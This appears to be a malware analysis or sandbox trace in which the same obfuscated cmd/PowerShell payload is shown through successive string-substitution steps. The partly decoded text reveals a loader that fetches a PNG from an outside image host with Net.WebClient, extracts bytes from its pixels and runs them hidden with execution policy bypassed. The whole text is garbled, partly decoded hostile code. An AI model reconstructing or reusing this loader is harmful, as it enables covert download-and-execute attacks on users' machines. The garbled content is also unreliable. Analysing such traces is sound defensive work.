Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaLuE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^\|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Tgo	1	Fn
Environment	Get Environment String	name = $+, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'png9a7'+'))['+'Fl66pBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBQI7 Zn10..H'+'2('+'))\Fl66pBBQI'+'GCV'+'GCVaKFl66pBBQI37s.aEe'+'GCVGCVyZ7el1Fl66pBBQI7,'+'Fl6'+'6pBBQI_'+')[Fl66pBBQImQI'+'{Fl66pBBQI'+'_H28+Fl66pBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBQIGCVGCV.B-3QI9an37Dn5)Dn6)-3QI9X]'+'1Fl66pBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaLuE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^\|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo	1	Fn
Environment	Get Environment String	name = _'{, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3k9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBk37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3k9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BkVsK_X.'+'png9a7'+'))['+'Fl66pBBk'+'mkaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBk7 Zn10..H'+'2('+'))\Fl66pBBk'+'GCV'+'GCVaKFl66pBBk37s.aEe'+'GCVGCVyZ7el1Fl66pBBk7,'+'Fl6'+'6pBBk_'+')[Fl66pBBkmk'+'{Fl66pBBk'+'_H28+Fl66pBBk7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBkGCVGCV.B-3k9an37Dn5)Dn6)-3k9X]'+'1Fl66pBBkGCV'+'GCV.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3k9le:eXbGCV).VaLuE.InFl6PjkEVDaXmBkanD.IqFl6NVPjkesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^\|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3k9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBkAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo	1	Fn
Environment	Get Environment String	name = ;`}~, result_out = set suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qFl6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'Fl66pBBk37s'+'aKFl] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11Fl] qFl6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgFlDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'Fl66pBBk'+'mkaKFl] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBk7 Zn10..H'+'2('+'))\Fl66pBBk'+'t'+'taKFl66pBBk37s.aEe'+'ttyZ7el1Fl66pBBk7,'+'Fl6'+'6pBBk_'+')[Fl66pBBkmk'+'{Fl66pBBk'+'_H28+Fl66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBktt.B-3k9an37Dn5)Dn6)-3k9X]'+'1Fl66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1Fl66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3k9le:e*Xbt).VaLuE.InFl6PjkEVDaXmBkanD.IqFl6NVPjkesVDaRZty%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^\|tyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo	1	Fn
Environment	Get Environment String	name = +?.,, result_out = set suL]f6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBk37s'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBk37s.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9an37Dn5)Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhI3737en -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6N37 ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo	1	Fn
Environment	Get Environment String	name = '], result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@s%zEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhIdden -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cmd.e7E cgc oadZ/Yo	1	Fn
Environment	Get Environment String	name = [$#?, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{sTRInaEPjy{VDaTzEhA]Pjy#H).ReplaVDaE11{VDaTzEhA]Pjy98+{VDaTzEhA]Pjy8#+{VDaTzEhA]PjyDn06),{sTRInaEPjy{VDaTzEhA]PjyDn2H).ReplaVDaE11{VDaTzEhA]PjyDnDn8+{VDaTzEhA]Pjy5H+{VDaTzEhA]Pjy8Dn),{sTRInaEPjy{VDaTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aVDaTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo	1	Fn
Environment	Get Environment String	name = }\, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aCTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:CXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo	1	Fn
Environment	Get Environment String	name = .@, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:eXbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aCTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:CXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y%	1	Fn
Environment	Get Environment String	name = }, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'ob') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'Eob1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:eobt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-LQoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y%	1	Fn
Environment	Get Environment String	name = `._, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'X') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-LQoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y%	1	Fn
Environment	Get Environment String	name = \#, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'X') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ 